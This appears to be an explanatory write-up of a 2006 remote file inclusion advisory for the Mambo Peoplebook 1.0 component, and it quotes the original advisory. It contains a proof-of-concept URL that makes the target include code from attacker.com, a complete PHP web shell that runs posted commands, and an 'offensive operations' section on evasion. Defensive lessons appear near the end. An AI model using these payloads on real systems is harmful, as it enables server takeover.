Understanding Remote File Inclusion in Mambo Component Peoplebook 1.0

What this paper is

This paper, published in 2006, details a critical Remote File Inclusion (RFI) vulnerability found in version 1.0 of the "Peoplebook Component" for the Mambo content management system. The vulnerability allows a remote attacker to execute arbitrary PHP code on the target server by tricking the application into including and executing a malicious file hosted on an attacker-controlled server.

Simple technical breakdown

The vulnerability lies in the param.peoplebook.php script within the com_peoplebook component. This script attempts to include a language file based on the $selected_lang variable. Crucially, it uses the $mosConfig_absolute_path variable, which is not properly validated.

If two PHP configurations are enabled on the server:

1. register_globals = On: This makes external variables (like those passed in the URL) directly available as global variables within the script.
2. allow_fopenurl = On: This allows PHP functions like require_once to fetch files from remote URLs.

An attacker can manipulate the $mosConfig_absolute_path variable via the URL. Instead of pointing to a local directory, they can make it point to a remote URL. The require_once function, when allow_fopenurl is on, will then fetch and execute the PHP code from that remote URL, effectively leading to remote code execution.

Complete code and payload walkthrough

The core of the vulnerability is in a small snippet of PHP code from param.peoplebook.php:

<?php

if (file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php')) {
   require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php');
}
else {
   require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');
}
...
?>

Let's break this down:

• <?php ... ?>: This is the standard PHP opening and closing tag, indicating that the enclosed code is PHP.
• if (file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php')):
  • Purpose: This line checks if a language file exists at a specific path.
  • $mosConfig_absolute_path: This variable is intended to hold the absolute path to the Mambo installation directory on the server. However, the paper states it's not properly sanitized.
  • '/components/com_peoplebook/languages/': This is a hardcoded string representing a subdirectory within the Mambo installation.
  • $selected_lang: This variable is expected to contain the name of the language file to be loaded (e.g., 'english', 'spanish').
  • '.php': This appends the .php extension to the language name.
  • file_exists(...): This PHP function checks if the file specified by the constructed path exists.
• require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php');:
  • Purpose: If the file_exists check returns true, this line includes and evaluates the specified language file. require_once ensures that the file is included only once, even if called multiple times.
  • Behavior: Normally, this would include a legitimate language file from the local filesystem. However, if $mosConfig_absolute_path is controlled by the attacker and allow_fopenurl is enabled, this require_once can fetch a remote file.
• else { ... }:
  • Purpose: If the specified language file does not exist, this block is executed.
  • require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');: This line attempts to include the default english.php language file. This also becomes a potential RFI vector if the initial file_exists check fails or if the attacker can control $mosConfig_absolute_path to point to a remote file even for the default.

Proof of Concept (PoC) Explanation:

http://[target]/[path]/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

• http://[target]/[path]/administrator/components/com_peoplebook/param.peoplebook.php: This is the URL to the vulnerable script on the target server.
• ?: This separates the URL path from the query parameters.
• mosConfig_absolute_path=: This is where the attacker injects their malicious value.
  • Because register_globals is On, the value provided after mosConfig_absolute_path= will be assigned to the $mosConfig_absolute_path variable within the param.peoplebook.php script.
  • The attacker sets it to http://attacker.com/evil.txt.
• http://attacker.com/evil.txt: This is the URL of a file hosted on the attacker's server. This file (evil.txt) would contain malicious PHP code.
• ?: The trailing ? after evil.txt is a common technique in RFI to ensure that the URL is parsed correctly by the web server and that any subsequent parameters intended for the target script are not misinterpreted as part of the remote file's URL. In this specific case, it's likely to ensure the mosConfig_absolute_path parameter is correctly terminated.

How it works together:

1. The attacker sends the crafted URL.
2. The web server receives the request and passes the mosConfig_absolute_path=http://attacker.com/evil.txt parameter to param.peoplebook.php.
3. Due to register_globals = On, $mosConfig_absolute_path is set to http://attacker.com/evil.txt.
4. The script then checks file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php'). Since $mosConfig_absolute_path is a URL, file_exists might behave unexpectedly or the condition might fail depending on the PHP version and configuration.
5. However, the else block is reached, or the if condition is bypassed if $selected_lang is also manipulated. The script executes require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');.
6. Because allow_fopenurl = On, require_once interprets $mosConfig_absolute_path as a remote URL and fetches http://attacker.com/evil.txt.
7. If evil.txt contains PHP code (e.g., <?php system($_GET['cmd']); ?>), this code is executed on the target server.

Payload/Shellcode:

The paper doesn't provide specific shellcode bytes but implies the use of a simple PHP injection script. A common example for such an RFI would be:

<?php
// A simple remote shell payload
echo "<h1>Mambo RFI Exploit</h1>";
echo "<form method='post' action=''>";
echo "<input type='text' name='cmd' placeholder='Enter command'>";
echo "<input type='submit' value='Execute'>";
echo "</form>";

if(isset($_POST['cmd'])) {
    echo "<pre>";
    system($_POST['cmd']);
    echo "</pre>";
}
?>

This PHP code, when hosted at http://attacker.com/evil.txt and included by the vulnerable Mambo component, would:

• Display a simple HTML form.
• Allow the attacker to input commands into a text field.
• Execute those commands on the target server using system($_POST['cmd']).
• Display the output of the executed command.

Mapping list:

• param.peoplebook.php: The vulnerable script.
• $mosConfig_absolute_path: The unsanitized variable that becomes the RFI vector.
• $selected_lang: A variable used to construct the path, can also be manipulated.
• require_once(): The PHP function that performs the file inclusion, which can fetch remote files if allow_fopenurl is on.
• register_globals = On: A PHP configuration that makes URL parameters directly available as global variables, enabling attacker control over $mosConfig_absolute_path.
• allow_fopenurl = On: A PHP configuration that allows require_once (and other file functions) to fetch content from URLs.
• http://attacker.com/evil.txt: The attacker-controlled URL containing the malicious PHP payload.

Practical details for offensive operations teams

• Required Access Level: No elevated privileges are initially required. This is a remote, unauthenticated vulnerability.
• Lab Preconditions:
  • A target Mambo installation with the "Peoplebook Component" version 1.0 installed.
  • The target server must have PHP configured with register_globals = On and allow_fopenurl = On. These were common settings in older PHP versions (pre-5.3) but are now considered insecure and often disabled.
  • An attacker-controlled web server to host the malicious PHP file.
• Tooling Assumptions:
  • A web browser to craft and send requests.
  • A simple text editor to create the malicious PHP payload.
  • A web server (e.g., Apache, Nginx) on the attacker's machine to serve the payload.
  • Potentially, a proxy tool like Burp Suite or OWASP ZAP for intercepting and modifying requests, though not strictly necessary for this simple RFI.
• Execution Pitfalls:
  • PHP Configuration: The most significant pitfall is the target server's PHP configuration. If register_globals is Off or allow_fopenurl is Off, this specific RFI will not work. Modern PHP versions (5.3+) have register_globals disabled by default and it's strongly discouraged. allow_fopenurl might also be disabled for security reasons.
  • WAF/IDS Evasion: Older web application firewalls (WAFs) or intrusion detection systems (IDS) might not effectively detect simple RFI patterns. However, modern systems are much more adept at identifying and blocking such requests. Evasion might involve URL encoding, using different protocols (if supported by allow_fopenurl), or obfuscating the payload.
  • Path Traversal/File Existence: The file_exists check in the if statement could potentially prevent exploitation if the attacker cannot craft a $selected_lang value that, when combined with the remote path, satisfies the condition in a way that still allows require_once to fetch the remote file. However, the else block provides a fallback.
  • Payload Complexity: The evil.txt file must contain valid PHP code. If it contains syntax errors or non-PHP content, it will likely result in a PHP parse error on the target server, not code execution.
  • Target Path: The [path] in the URL needs to be correct for the Mambo installation.
• Telemetry:
  • Network Traffic: Outbound HTTP requests from the target server to the attacker's server (if allow_fopenurl is used for fetching).
  • Web Server Logs: Requests to param.peoplebook.php with unusual mosConfig_absolute_path parameters.
  • PHP Error Logs: PHP parse errors if the remote file is not valid PHP.
  • System Logs: If the executed payload performs system-level actions (e.g., creating files, running commands), these might be logged by the operating system or security tools.
  • Application Logs: Mambo or component-specific logs might show errors or unexpected behavior.

Where this was used and when

• Context: This vulnerability was relevant to websites using the Mambo CMS and specifically the "Peoplebook Component" version 1.0.
• Timeframe: The paper was published on August 14, 2006. Therefore, this vulnerability was actively exploitable around 2006. Given that Mambo was a popular CMS at the time, it's likely that many sites were vulnerable. Mambo itself was later forked into Joomla!, so understanding these older vulnerabilities helps in appreciating the evolution of web application security.

Defensive lessons for modern teams

• Disable register_globals: This is a fundamental security best practice. It has been deprecated and removed in later PHP versions for good reason. Always ensure it's Off.
• Disable allow_fopenurl: Unless absolutely necessary for legitimate remote file operations (which is rare and should be carefully managed), disable allow_fopenurl in php.ini. This mitigates a wide range of RFI and SSRF vulnerabilities.
• Input Validation and Sanitization: Never trust user input. Always validate and sanitize any data coming from external sources (URL parameters, form data, cookies, etc.) before using it in file operations, database queries, or system commands. For file paths, use functions like basename() and ensure paths are absolute and within expected directories.
• Use Secure Coding Practices: Developers should be trained to avoid insecure functions or patterns. For file inclusions, prefer explicit paths and avoid user-controlled variables where possible. If dynamic includes are necessary, implement strict whitelisting of allowed file names.
• Keep Software Updated: Ensure CMS, components, plugins, and the underlying PHP version are always updated to the latest secure versions. Vulnerabilities like this are typically patched in later releases.
• Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts. However, WAFs should be a layer of defense, not the sole solution.

ASCII visual (if applicable)

+-----------------+     +-------------------------+     +-----------------+
| Attacker Server | --> | Target Web Server       | --> | Target PHP App  |
| (e.g., evil.com)|     | (e.g., vulnerable.com)  |     | (Mambo Component)|
+-----------------+     +-------------------------+     +-----------------+
        ^                       |                               |
        |                       | HTTP Request                  |
        |                       | (Crafted URL with             |
        |                       | mosConfig_absolute_path=      |
        |                       | http://evil.com/evil.php)     |
        |                       v                               |
        |                       +-------------------------------+
        |                       | param.peoplebook.php          |
        |                       | (Vulnerable Script)           |
        |                       |                               |
        |                       | require_once(               |
        |                       |   $mosConfig_absolute_path    |
        |                       |   . '/languages/' .           |
        |                       |   $selected_lang . '.php'    |
        |                       | )                             |
        |                       |                               |
        |                       | (If allow_fopenurl=On,        |
        |                       |  fetches http://evil.com/     |
        |                       |  evil.php and executes it)    |
        |                       +-------------------------------+
        |                                       |
        |                                       | PHP Code Execution
        |                                       v
        +---------------------------------------+

Source references

• Paper URL: https://www.exploit-db.com/papers/2184
• Exploit-DB Raw URL: https://www.exploit-db.com/raw/2184
• Affected Software: Mambo Component Peoplebook v1.0
• Author: Matdhule
• Publication Date: 2006-08-14

Original Exploit-DB Content (Verbatim)

---------------------------------------------------------------------------
Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Author          : Matdhule
Date            : August, 14th 2006
Location        : Indonesia, Jakarta
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Peoplebook Component

Application     : Peoplebook Component
version         : 1.0
URL             : www.mamboforge.net/projects/peoplebook

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

in folder com_peoplebook we found vulnerability script param.peoplebook.php.

-----------------------param.peoplebook.php----------------------
....
<?php

if (file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php')) {
   require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php');
}
else {
   require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');
}
...
----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.

Proof Of Concept:
~~~~~~~~~~~~~~~

http://[target]/[path]/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

Solution:
~~~~~~~

sanitize variabel $mosConfig_absolute_path in param.peoplebook.php


---------------------------------------------------------------------------
Shoutz:
~~~~~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @ irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~

     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ] ---------------------------------- 

# milw0rm.com [2006-08-14]